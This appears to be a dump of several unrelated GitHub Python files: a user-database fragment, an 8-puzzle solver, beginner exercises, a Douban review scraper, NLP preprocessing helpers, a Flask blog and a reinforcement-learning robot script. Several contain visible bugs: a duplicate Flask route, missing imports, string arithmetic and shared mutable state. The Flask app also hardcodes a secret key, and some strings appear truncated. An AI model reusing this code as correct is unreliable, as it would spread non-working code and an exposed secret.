%s'%str(group_id))\n else: # no specified group_id, create group and assign user to it\n \n new_group = self.instance.user_groups.createUserGroup()\n \n user_spec['_id'] = str(ObjectId())\n user_spec['group_id'] = new_group._id\n \n new_user = User(user_spec) # TODO check spec valid?\n \n self.instance.user_settings.createUserSettings(new_user)\n self.instance.user_groups.moveUser(new_user, new_group, rights)\n \n self.cat.insert(new_user.get())\n out = True\n else:\n print('[Users::addUser] user {} already exist'.format(user_spec['email']))\n \n return out\n\n#----------------------------------------------------------------------------------------------\n def removeUserById(self, user_id):\n out = False\n user = self.getUserById(user_id)\n if user:\n out = self.removeUser(user)\n return out\n \n#----------------------------------------------------------------------------------------------\n def removeUser(self, user_object, clear_all_if_empty_group = False):\n ''' removes user by id. cause modifying user group and remove it if necessary'''\n out = False\n \n user = self.getUserById(user_object._id)\n if user:\n group = self.instance.user_groups.get_user_group(user.group_id)\n if group:\n self.instance.user_groups.removeUserFromGroup(user, group)\n \n user_settings = self.instance.user_settings.getUserSettings(user._id)\n if user_settings:\n self.instance.user_settings.removeUserSettings(user_settings)\n else:\n print('failed to remove user settings')\n \n if group.usersNum() == 0 and clear_all_if_empty_group:\n self.instance.user_groups.removeGroup(group)\n else:\n self.instance.user_groups.update_user_group(group)\n \n self.cat.remove({\"_id\": user._id})\n out = True\n else:\n print('[Users::removeUser] invalid group')\n else:\n print(\"[Users::remove_user] user {} does'nt exist\".format(id))\n return out\n\n#----------------------------------------------------------------------------------------------\n def modify_user(self, id, spec):\n pass\n\n#----------------------------------------------------------------------------------------------\n def getUserById(self, _id):\n data = self.cat.find_one({'_id':_id})\n if data:\n return User(data)\n return None\n\n#----------------------------------------------------------------------------------------------\n def get_user_by_name(self, login):\n data = self.cat.find_one({'email':login})\n if data:\n return User(data)\n return None\n\n#----------------------------------------------------------------------------------------------\n def drop(self):\n '''drop collection. rem in production'''\n self.cat.drop()","repo_name":"innovatelogic/shop7","sub_path":"src/common/db/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74618753833","text":"import sys\n\n\nclass Tree:\n __nodes = []\n __path = []\n __value = \"\"\n __side = 0\n\n def __init__(self, val):\n self.__value = val\n self.__side = len(val) ** .5\n print(\"init\")\n #self.__path.append(val)\n #print(self.__path)\n#ISSUE\n def add_node(self, node):\n self.__nodes.append(node)\n node.__path = []\n for i in range(0, len(self.__path)):\n node.__path.append(self.__path[i])\n node.__path.append(node.__value)\n print(\"addnode\")\n\n def get_path(self):\n print(\"getpath\")\n return self.__path\n\n def get_nodes(self):\n print(\"getnodes\")\n return self.__nodes\n\n def get_val(self):\n print(\"getval\")\n return self.__value\n\n def is_correct(self):\n print(\"iscorrect\")\n if self.__value == \"12345678_\":\n return True\n else: return False\n\n def is_incorrect(self):\n print(\"isincorrect\")\n if self.__value == \"12345687_\":\n return True\n else: return False\n\n def move(self):\n print(\"move\")\n if self.is_correct():\n # print(\"correct\")\n return self.__path\n if self.is_incorrect():\n # print(\"incorrect\")\n return self.__path\n index = self.__value.index(\"_\")\n if index == 0:\n self.moveleft(0)\n self.moveup(0)\n elif index == 1:\n self.moveup(1)\n self.moveright(1)\n self.moveleft(1)\n elif index == 2:\n self.moveup(2)\n self.moveright(2)\n elif index == 3:\n self.moveleft(3)\n self.movedown(3)\n self.moveup(3)\n elif index == 4:\n self.moveright(4)\n self.moveleft(4)\n self.moveup(4)\n self.movedown(4)\n elif index == 5:\n self.moveright(5)\n self.movedown(5)\n self.moveup(5)\n elif index == 6:\n self.moveleft(6)\n self.movedown(6)\n elif index == 7:\n self.movedown(7)\n self.moveleft(7)\n self.moveright(7)\n elif index == 8:\n self.moveright(8)\n self.movedown(8)\n # hardcoded corners\n #if index == 0:\n # self.moveleft(index)\n # self.moveup(index)\n #if index == self.__side - 1:\n # self.moveright(index)\n # self.moveup(index)\n #if index == len(self.__value)-1:\n # self.moveright(index)\n # self.movedown(index)\n #if index == len(self.__value)-self.__side:\n # self.moveleft(index)\n # self.movedown(index)\n # edges\n #elif index % 3 == 0:\n # self.moveup(index)\n # self.movedown(index)\n # self.moveleft(index)\n # elif index % 3 == self.__side - 1:\n # self.moveup(index)\n # self.movedown(index)\n # self.moveright(index)\n # # centers\n # else:\n # self.moveright(index)\n # self.moveleft(index)\n # self.moveup(index)\n # self.movedown(index)\n # print(\"other\")\n return []\n # recur no recurring nvm\n\n def swap(self, index1, index2):\n print(\"swap\")\n t = list(self.__value)\n t[index1], t[index2] = t[index2], t[index1]\n self.__value = ''.join(t)\n\n def moveleft(self, gapindex):\n print(\"moveleft\")\n st1 = self.__value\n #st[gapindex], st[gapindex+1] = st[gapindex+1], st[gapindex]\n t1 = list(st1)\n t1[int(gapindex)], t1[int(gapindex + 1)] = t1[int(gapindex + 1)], t1[int(gapindex)]\n self.add_node(Tree(''.join(t1)))\n\n def moveright(self, gapindex):\n print(\"moveright\")\n st2 = self.__value\n #st[gapindex], st[gapindex-1] = st[gapindex-1], st[gapindex]\n t2 = list(st2)\n t2[int(gapindex)], t2[int(gapindex - 1)] = t2[int(gapindex - 1)], t2[int(gapindex)]\n self.add_node(Tree(''.join(t2)))\n\n def moveup(self, gapindex):\n print(\"moveup\")\n st3 = self.__value\n t3 = list(st3)\n #st[int(gapindex)], st[int(gapindex)+int(self.__side)] = st[int(gapindex)+int(self.__side)], st[int(gapindex)]\n t3[int(gapindex)], t3[int(gapindex+self.__side)] = t3[int(gapindex+self.__side)], t3[int(gapindex)]\n self.add_node(Tree(''.join(t3)))\n\n def movedown(self, gapindex):\n print(\"movedown\")\n st4 = self.__value\n t4 = list(st4)\n #st[gapindex], st[gapindex-self.__side] = st[gapindex-self.__side], st[gapindex]\n t4[int(gapindex)], t4[int(gapindex-self.__side)] = t4[int(gapindex-self.__side)], t4[int(gapindex)]\n self.add_node(Tree(''.join(t4)))\n\ninp = sys.argv[1]\nif(len(inp)==8):\n inp = (inp, \"_\")\nelif(len(inp)<8):\n inp = (inp, \"_\", sys.argv[2])\ninp = ''.join(inp)\n#print(inp)\ntree = Tree(inp)\n\n\narr = [tree]\n#popped = arr.pop(0)\nwhile len(arr[0].move()) == 0: #len(popped.move()) == 0:\n #print(popped.get_path())\n print(arr[0].get_path())\n for i in range(0, len(arr[0].get_nodes())): #range(0, len(popped.get_nodes())):\n print(\"1\")\n arr.append(arr[0].get_nodes()[i]) #arr.append(popped.get_nodes()[i])\n print(\"2\")\n arr.pop(0)\n #popped = arr.pop(0)\n#print(len(popped.move()))\n#print(len([]))\n#print(popped.move())\n#print(popped.get_path())\nprint(arr[0].get_path())","repo_name":"ericktian/8game","sub_path":"8gameefficient.py","file_name":"8gameefficient.py","file_ext":"py","file_size_in_byte":5421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3338560815","text":"#!/usr/bin/python3\n\"\"\"Defining class square\"\"\"\n\n\nclass Square:\n \"\"\"Representing a square\"\"\"\n\n def __init__(self, size=0):\n \"\"\"Initializing square\"\"\"\n self.size = size\n\n @property\n def size(self):\n \"\"\"Getter of __size\"\"\"\n return self.__size\n\n @size.setter\n def size(self, value):\n \"\"\"Setter of __size\"\"\"\n if type(value) is not int:\n raise TypeError(\"size must be an integer\")\n elif value < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = value\n\n def area(self):\n \"\"\"Computes the area of the square\"\"\"\n return self.size ** 2\n\n def my_print(self):\n \"\"\"prints in stdout the square with the character #\"\"\"\n from sys import stdout as out\n if self.__size == 0:\n print(\"\", file=out)\n return\n for i in range(self.__size):\n for j in range(self.__size):\n print(\"#\", end=\"\", file=out)\n print(\"\")\n","repo_name":"JuanSebastianGB/holbertonschool-higher_level_programming","sub_path":"0x06-python-classes/5-square.py","file_name":"5-square.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39806675612","text":"'''\nWrite a program that implements the formula:\nA = P * R * T\n'''\n\nprincipal = input('Enter principal amount: ')\nrate = input('Enter rate(in percentage): ')\ntime = input('Enter time given(years): ')\n\n\namount = principal * rate/100 * time\n\nprint ('The amount accumulated after {} years is {}'.format(time, amount) )","repo_name":"stellakaniaru/practice_solutions","sub_path":"get_amount.py","file_name":"get_amount.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16918210749","text":"#老师的代码\nimport requests,re,time\nfrom bs4 import BeautifulSoup\n\ncount=0 \ni=0 #页数\ns,count_s,count_del=0,0,0\nlst_stars=[]\nwhile count<50:\n try:\n r=requests.get('https://book.douban.com/subject/30398273/comments/hot?p='+str(i+1))\n except Exception as err:\n print(err)\n break\n soup=BeautifulSoup(r.text,'lxml')\n comments=soup.find_all('span','short') #直接取得评论\n \n pattern=re.compile('50):\n count_del+=1 #超出50条记录的部分\n else:\n print(count,item.string)\n \n for star in p:\n lst_stars.append(int(star))\n \n time.sleep(5)\n i+=1 #更新页数\n \nfor star in lst_stars[:-count_del]:\n s+=int(star)\nprint(\"average is:{:2f}\".format(s//(len(lst_stars)-count_del)))","repo_name":"pxjw/Python_data_analysys","sub_path":"classtest/spider_tech.py","file_name":"spider_tech.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1437158530","text":"# O(N), O(1) stefan pochmann solution\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n ans = 0\n for n in nums:\n if ans < 2 or n != nums[ans-2]:\n nums[ans] = n\n ans += 1\n return ans\n \n","repo_name":"henryliuser/hliu-cp","sub_path":"leetcode/medium/remove_duplicates_ii.py","file_name":"remove_duplicates_ii.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"28020029225","text":"import collections\nfrom colorama import Fore\nfrom colorama import Style\nimport random\nimport hashlib\nfrom nltk.tokenize import word_tokenize\nimport torch\nimport torch.nn as nn\nimport torch.nn.init as init\nimport os\n\n#\n# def segment_counts(input):\n# lines=len([line for line in input])\n# return lines\n\ndef truecase(str):\n return str[0].lower()+str[1:]\n\ndef uppercase2normal(sent):\n '''\n This function convert a sentence to lowercase if the whole sentence is in uppercase,\n else, convert the leading character to lowercase (truecase).\n '''\n if sent.isupper():\n return sent.lower()\n else:\n return truecase(sent)\n\n\n\n# def diff_src_tgt_warn(src,tgt):\n# if segment_counts(src)!=segment_counts(tgt):\n# print(f\" {Fore.RED}WARNING: {src} and {tgt} have different segment counts.{Style.RESET_ALL}\")\n# else:\n# pass\n\n\ndef removeEmptyParallel(src,tgt):\n with open(src,'r', encoding='utf8') as s,\\\n open(tgt,'r',encoding='utf8') as t,\\\n open(f\"{src}.noEmpty.sl\",'w', encoding='utf8') as os,\\\n open(f\"{tgt}.noEmpty.tl\",'w', encoding='utf8') as ot:\n\n for line_s, line_t in zip(s,t):\n if line_s.strip() and line_t.strip():\n os.write(line_s)\n ot.write(line_t)\n\ndef hash_sent(sent):\n return hashlib.md5(sent.strip().encode('utf8')).hexdigest()\n\n\ndef removeDuplicateParallel(src,tgt):\n hash_set_src=set()\n hash_set_tgt=set()\n with open(src, 'r', encoding='utf8') as s, \\\n open(tgt, 'r', encoding='utf8') as t, \\\n open(f\"{src}.noDuplicate.sl\", 'w', encoding='utf8') as os, \\\n open(f\"{tgt}.noDuplicate.tl\", 'w', encoding='utf8') as ot:\n for line_s, line_t in zip(s,t):\n hash_s=hash_sent(line_s)\n hash_t=hash_sent(line_t)\n if hash_s not in hash_set_src and hash_t not in hash_set_tgt:\n os.write(line_s)\n ot.write(line_t)\n hash_set_src.add(hash_s)\n hash_set_tgt.add(hash_t)\n\n\ndef text2vocab(input, vocab_size):\n '''\n\n input: a list of preprocessed input file.\n vocab_size: define the size of the vocabulary.\n :return: a vocabulary output file.\n\n Convert input corpus to a top ranked n vocab list including , and UNK.\n For languages that need segmentation (e.g. Zh,Ja and De etc.), please preprocess the corpus before passing in.\n '''\n\n\n tmp = []\n final = [] # Add idx of , , and UNK.\n with open(input,'r',encoding='utf8') as f:\n for line in f:\n line=uppercase2normal(line)\n line=word_tokenize(line)\n line=' '.join(line)\n for w in line.strip().split():\n tmp.append(w)\n w_count=collections.Counter(tmp).most_common()[:vocab_size]\n for t in w_count:\n final.append(t[0])\n final.insert(0, '
    ')\n final.insert(0, '')\n final.insert(0, '')\n final.insert(0, '')\n return final\n\n\ndef word2idx(vocab):\n '''\n Return a dictionary {word:idx}.\n '''\n with open(vocab,'r',encoding='utf8') as f:\n word2idx={line.strip(): idx for idx,line in enumerate(f)}\n return word2idx\n\n\ndef sent2idx(vocab,sent):\n dict=word2idx(vocab)\n s=[dict['']]\n for w in sent.strip().split():\n if w not in dict.keys():\n s.append(dict[''])\n else:\n s.append(dict[w])\n s.append(dict[''])\n return s\n\ndef splitTrainTuneTest(src,tgt,sum_size,tune_size,test_size):\n '''\n sum_size: original corpus size (before splitting).\n tune_size: tune set size.\n test_size: test set size.\n '''\n with open(src,'r',encoding='utf8') as s,\\\n open(tgt,'r', encoding='utf8') as t,\\\n open('train.src','w',encoding='utf8') as train_s,\\\n open('train.tgt','w',encoding='utf8') as train_t,\\\n open('tune.src','w',encoding='utf8') as tune_s,\\\n open('tune.tgt','w',encoding='utf8') as tune_t,\\\n open('test.src','w',encoding='utf8') as test_s,\\\n open('test.tgt','w',encoding='utf8') as test_t:\n rand = random.sample(range(sum_size), sum_size)\n # print(rand)\n rand_tune = [i for i in rand[:tune_size]]\n print(rand_tune)\n rand_test = [i for i in rand[tune_size:tune_size+test_size]]\n print(rand_test)\n for i, (line_s, line_t) in enumerate(zip(s,t)):\n if i in rand_tune:\n tune_s.write(line_s)\n tune_t.write(line_t)\n elif i in rand_test:\n test_s.write(line_s)\n test_t.write(line_t)\n else:\n train_s.write(line_s)\n train_t.write(line_t)\n\n\ndef weight_init(m):\n '''\n Usage:\n model = Model()\n model.apply(weight_init)\n Info: https://gist.github.com/jeasinema/ed9236ce743c8efaf30fa2ff732749f5\n '''\n if isinstance(m, nn.Conv1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.BatchNorm1d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm3d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.Linear):\n init.xavier_normal_(m.weight.data)\n init.normal_(m.bias.data)\n elif isinstance(m, nn.LSTM):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.LSTMCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRU):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRUCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n\n\ndef init_weights(m):\n for name, param in m.named_parameters():\n nn.init.uniform_(param.data, -0.08, 0.08)\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)","repo_name":"hanjingyi/seq2seq_attention_pytorch","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":7395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74391653354","text":"from pickle import APPEND\n\n\ndef countdown(num):\n list = []\n for i in range(num, -1, -1):\n list.append(i)\n return list\nprint(countdown(5)) \n\ndef print_return(x,y):\n print (x)\n return (y)\ni = print_return(3,5)\n\n\ndef first_plus_length(list):\n sum=(list [0])\n x= (sum + len(list))\n return x\nprint (first_plus_length([1,2,3,4,5]))\n\n\n\ndef greater_than_second(list):\n x=[]\n if len(list) <= 2:\n return'False'\n for i in range(0,len(list),1):\n if list[i] > list[1]:\n x.append (list[i]) \n print (len(x)) \n return x\n \n \nprint (greater_than_second([5,2,3,2,1,4]))\nprint (greater_than_second([5,2]))\n\n\ndef length_value(x,y):\n z=[]\n for i in range(0,x):\n z.append(y) \n \n return z\n \n\n\nprint (length_value(4,7))\nprint (length_value(6,2))","repo_name":"bchang0999/Python","sub_path":"class/lectures/function_basic_ii.py","file_name":"function_basic_ii.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25946797630","text":"from flask import Flask, render_template, redirect, url_for, flash\nfrom flask_bootstrap import Bootstrap\nfrom flask_ckeditor import CKEditor\nfrom datetime import date\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.orm import relationship\nfrom flask_login import UserMixin, login_user, LoginManager, login_required, current_user, logout_user\nfrom forms import CreatePostForm\nfrom flask_gravatar import Gravatar\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = '8BYkEfBA6O6donzWlSihBXox7C0sKR6b'\nckeditor = CKEditor(app)\nBootstrap(app)\n\n##CONNECT TO DB\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///blog.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n@login_manager.user_loader\ndef load_user(user_id):\n return User.get(user_id)\n\n##CONFIGURE TABLES\n\nclass User(db.Model):\n __tablename__ = \"users\"\n id = db.Column(db.Integer, primary_key = True)\n name = db.Column(db.String(250), nullable=False)\n email = db.Column(db.String(250), nullable=False)\n password = db.Column(db.String(250), nullable=False)\n posts = relationship(\"BlogPost\")\n\n\nclass BlogPost(db.Model):\n __tablename__ = \"blog_posts\"\n id = db.Column(db.Integer, primary_key=True)\n # Create Foreign Key, \"users.id\" the users refers to the tablename of User.\n author_id = db.Column(db.Integer, db.ForeignKey(\"users.id\"))\n # Create reference to the User object, the \"posts\" refers to the posts protperty in the User class.\n author = relationship(\"User\", back_populates=\"posts\")\n title = db.Column(db.String(250), unique=True, nullable=False)\n subtitle = db.Column(db.String(250), nullable=False)\n date = db.Column(db.String(250), nullable=False)\n body = db.Column(db.Text, nullable=False)\n img_url = db.Column(db.String(250), nullable=False)\ndb.create_all()\n\nclass RegisterForm(FlaskForm):\n email = StringField(\"Enter your email\"),\n password = StringField(\"Enter your password\")\n name = StringField(\"Name\", validators=[DataRequired()])\n submit = SubmitField(\"Sign Me Up!\")\n\n@app.route('/')\ndef get_all_posts():\n posts = BlogPost.query.all()\n return render_template(\"index.html\", all_posts=posts)\n\n\n@app.route('/register')\ndef register():\n return render_template(\"register.html\")\n\n\n@app.route('/login')\ndef login():\n return render_template(\"login.html\")\n\n\n@app.route('/logout')\ndef logout():\n return redirect(url_for('get_all_posts'))\n\n\n@app.route(\"/post/\")\ndef show_post(post_id):\n requested_post = BlogPost.query.get(post_id)\n return render_template(\"post.html\", post=requested_post)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/contact\")\ndef contact():\n return render_template(\"contact.html\")\n\n\n@app.route(\"/new-post\")\ndef add_new_post():\n form = CreatePostForm()\n if form.validate_on_submit():\n new_post = BlogPost(\n title=form.title.data,\n subtitle=form.subtitle.data,\n body=form.body.data,\n img_url=form.img_url.data,\n author=current_user,\n date=date.today().strftime(\"%B %d, %Y\")\n )\n db.session.add(new_post)\n db.session.commit()\n return redirect(url_for(\"get_all_posts\"))\n return render_template(\"make-post.html\", form=form)\n\n\n@app.route(\"/edit-post/\")\ndef edit_post(post_id):\n post = BlogPost.query.get(post_id)\n edit_form = CreatePostForm(\n title=post.title,\n subtitle=post.subtitle,\n img_url=post.img_url,\n author=post.author,\n body=post.body\n )\n if edit_form.validate_on_submit():\n post.title = edit_form.title.data\n post.subtitle = edit_form.subtitle.data\n post.img_url = edit_form.img_url.data\n post.author = edit_form.author.data\n post.body = edit_form.body.data\n db.session.commit()\n return redirect(url_for(\"show_post\", post_id=post.id))\n\n return render_template(\"make-post.html\", form=edit_form)\n\n\n@app.route(\"/delete/\")\ndef delete_post(post_id):\n post_to_delete = BlogPost.query.get(post_id)\n db.session.delete(post_to_delete)\n db.session.commit()\n return redirect(url_for('get_all_posts'))\n\n\n# Register new users into the User database\n@app.route('/register', methods=[\"GET\", \"POST\"])\ndef register():\n form = RegisterForm()\n if form.validate_on_submit():\n hash_and_salted_password = generate_password_hash(\n form.password.data,\n method='pbkdf2:sha256',\n salt_length=8\n )\n new_user = User(\n email=form.email.data,\n name=form.name.data,\n password=hash_and_salted_password,\n )\n db.session.add(new_user)\n db.session.commit()\n\n return redirect(url_for(\"get_all_posts\"))\n\n return render_template(\"register.html\", form=form)\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"TheDevNinja/Day-69","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26335365436","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 13 12:28:25 2018\n\n@author: Luis Gustavo Grubert Valensuela\n*******************************************************************************\nName: Luis Gustavo Grubert Valensuela Z#:23351882 lvalensuela2015@fau.edu\nCourse: Python Programming COP 4045-001 Spring 2018\nProfessor: Dr. Ionut Cardei\nDue Date:02/18/2018 Due Time: 11:30PM\nAssignment Homework 3\nLast Changed: 02/18/2018\nDescription:\nIn this assignment tree functions will be created:\n a) A function called input_tuple (in a new file p1.py) that reads from the\n terminal a sequence of objects with types provided by a tuple given as\n parameter and that returns the sequence of objects read as a tuple.\n b) a function called input_tuple_lc that is identical to input_tuple except \n that it uses list comprehension(s).\n c) a function read_tuple that works similarly to input_tuple, but instead \n of reading input from the terminal, it reads text from a file object passed \n as argument. \n*******************************************************************************\n\"\"\"\ndef treatTrueFalseStrings(booleanString):\n \"\"\" Function to parse true of false values from a string \"\"\"\n booleanInt = booleanString\n listFalseString = [\"False\",\"false\",\"0\",\"\",\" \",\"FALSE\"]\n if (booleanString in listFalseString):\n booleanInt = 0\n return booleanInt\n\ndef input_tuple(prompt, types, sep = \",\"):\n \"\"\" that reads from the\n terminal a sequence of objects with types provided by a tuple given as\n parameter and that returns the sequence of objects read as a tuple. \"\"\"\n inputString = str(input(prompt))\n listString = inputString.split(sep)\n try:\n if(len(listString) == len(types)):\n for i in range(len(listString)):\n listString[i] = types[i](treatTrueFalseStrings(listString[i]))\n \n myTuple = tuple(listString)\n else:\n #print(\"An error has occurred 1.\")\n myTuple = ()\n except:\n #print(\"An error has occurred 2.\")\n myTuple = ()\n return myTuple\n\ndef input_tuple_lc(prompt, types, sep = \",\"):\n \"\"\" a function called input_tuple_lc that is identical to input_tuple\n except that it uses list comprehension(s) \"\"\"\n try:\n inputString = str(input(prompt))\n listString = inputString.split(sep)\n lst = [types[i](treatTrueFalseStrings(listString[i])) for i in range(len(listString)) if (len(listString) == len(types)) ]\n myTuple = tuple(lst);\n except:\n #print(\"An error has occurred 3.\")\n myTuple=[]\n return myTuple;\n\ndef read_tuple(file_obj, types, sep):\n \"\"\"reads text from a file object passed \n as argument. \"\"\"\n try:\n \n line_str_list = []\n \n \n \"\"\"\n The commented code below was transformed in two comprehension lists.\n \n for line_str in file_obj:\n line_str_list.append(line_str.split(sep))\n \n for i in range(len(line_str_list)):\n print(line_str_list[i])\n for j in range(len(line_str_list[i])):\n print(line_str_list[i][j])\n line_str_list[i][j] = types[j](treatTrueFalseStrings(line_str_list[i][j].replace(\"\\n\", \"\")))\n \n \"\"\"\n \n [line_str_list.append(line_str.split(sep)) for line_str in file_obj]\n line_str_list2 = []\n line_str_list2 = [types[j](treatTrueFalseStrings(line_str_list[i][j].replace(\"\\n\", \"\")))\n for i in range(len(line_str_list))\n for j in range(len(line_str_list[i]))]\n \n # get only the first line read from the file.\n myTuple = tuple(line_str_list2[0:len(types)]);\n return(myTuple)\n \n except:\n print(\"An error has occurred 3.\")\n myTuple = ()\n return myTuple\n\ndef testif(b, testname, msgOK = \"\", msgFailed = \"\"):\n \"\"\" function created to test the program. Reurns true if a tuple is \n returned as the return statement\"\"\"\n if type(b):\n print(\"Success: \" + testname + \"; \"+ msgOK)\n else:\n print(\"Failed: \" + testname + \"; \"+ msgFailed)\n \n print(\"\\n\")\n return b\n\nprint(input_tuple(\"Enter first name, last name, age ( float), ID (int), fulltime (bool): \",\n(str, str, float, int, bool), # this is the tuple with expected types\n\",\"))\n\ntestif(isinstance(input_tuple(\"Enter first name, last name, age ( float), ID (int), fulltime (bool): \",\n(str, str, float, int, bool), # this is the tuple with expected types\n\",\"), tuple), \"input_tuple test\")\n\ntestif(isinstance(input_tuple_lc(\"Enter first name, last name, age ( float), ID (int), fulltime (bool): \",\n(str, str, float, int, bool), # this is the tuple with expected types\n\",\"),tuple), \"input_tuple_lc test\")\n\nf = open(\"cars.csv\", \"r\")\ntestif(isinstance(read_tuple(f, (str, str, float, int, bool), \",\"), tuple), \"read_tuple test\")\nf.close()\n","repo_name":"valen22br/pythonProjects","sub_path":"fau/H3/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74383090151","text":"'''\n Bryon Kucharski\n Wentorth Institute of Technology\n Summer 2018\n \n Applying a DQN to a 2D simulation of a 1D robot\n Similiar to http://edersantana.github.io/articles/keras_rl/\n\n The environment is a stddraw enviornment with a topdown view (see simulated_1D_robot_topdown.py)\n \n It is used to learn the X direction of the robot\n it uses a matrix of 0s and 1s (taken from stddraw enviornment) to calculate the state \n\n'''\n\nimport numpy as np\nimport os, sys, inspect\nimport time\nfrom random import randint\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom matplotlib import style\nimport tensorflow as tf\n\n\nstyle.use('fivethirtyeight')\n\n\n \n\n#this is just to import rl agent from a different folder\nrl_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],\"../rl\")))\nif rl_subfolder not in sys.path:\n sys.path.insert(0, rl_subfolder)\n\nfrom DQNAgent import DQNAgent\n\nrobot_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],\"../robot\")))\nif robot_subfolder not in sys.path:\n sys.path.insert(0, robot_subfolder)\n\nfrom simulated_1D_robot import simulated_1D_robot\n\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\nfrom keras import backend as K\nK.set_session(sess)\n\n\nnum_grid_x = 5\nnum_grid_y = 100\n\nsave_model = True\nload_model = False\nupdate_model = True\nmodel_name = 'RewardFunction2_2000.h5'\ndraw_scene = True\n\nif (load_model):\n esp = 0.01\nelse:\n esp = 1\n\nrobot = simulated_1D_robot(\n goalie_pos_start = 3, \n GRID_NUM_HEIGHT = num_grid_y, \n GRID_NUM_WIDTH = num_grid_x, \n GRID_SIZE = 10,\n draw_scene = draw_scene,\n gridworld = True\n )\n\nagent = DQNAgent(#state_size =num_grid_y*num_grid_x,\n state_size =2, \n action_size = 3,\n gamma = 0.95,\n epsilon = esp,\n epsilon_min = 0.01,\n epsilon_decay = 0.995,\n learning_rate = 0.001, \n model_type = 'DeepModel'\n )\n\nEPOCHS = 5000\nif not draw_scene:\n UPDATE_FREQ = 1000000\nelse:\n UPDATE_FREQ = 1000000\n\nbatch_size = 32\n\nstart = time.time()\ndone = False\nreward_count = 0\ntotal_reward = 0\ntotal_rewards = []\nnum_epochs = []\ntotal_loss = []\n\naxes = plt.gca()\n#axes.set_xlim(0, 100)\n#axes.set_ylim(-50, +50)\nline, = axes.plot(num_epochs, total_rewards, 'r-')\n\nif load_model: \n agent.load(model_name)\n\n\n\nfor r in range(EPOCHS):\n #state = robot.get_state_matrix()\n state = robot.get_state_array()\n state = np.array([state])\n #print(state)\n robot.reset()\n \n i = 0\n\n while not done:\n end = time.time()\n elapsed = end - start\n \n if elapsed > 1/UPDATE_FREQ:\n \n if draw_scene:\n robot.drawGridScene()\n\n start = time.time()\n action = agent.take_action(state)\n state_prime, reward, done = robot.step(action, stateType = 'array')\n state_prime = np.array([state_prime])\n\n total_reward += reward\n \n if update_model:\n agent.remember(state, action, reward, state_prime, done)\n\n #print(\"\\nState: \\n\" + str(state.reshape(num_grid_y,num_grid_x)) + \" \\naction: \" + str(action) + \" Reward: \" + str(reward) + 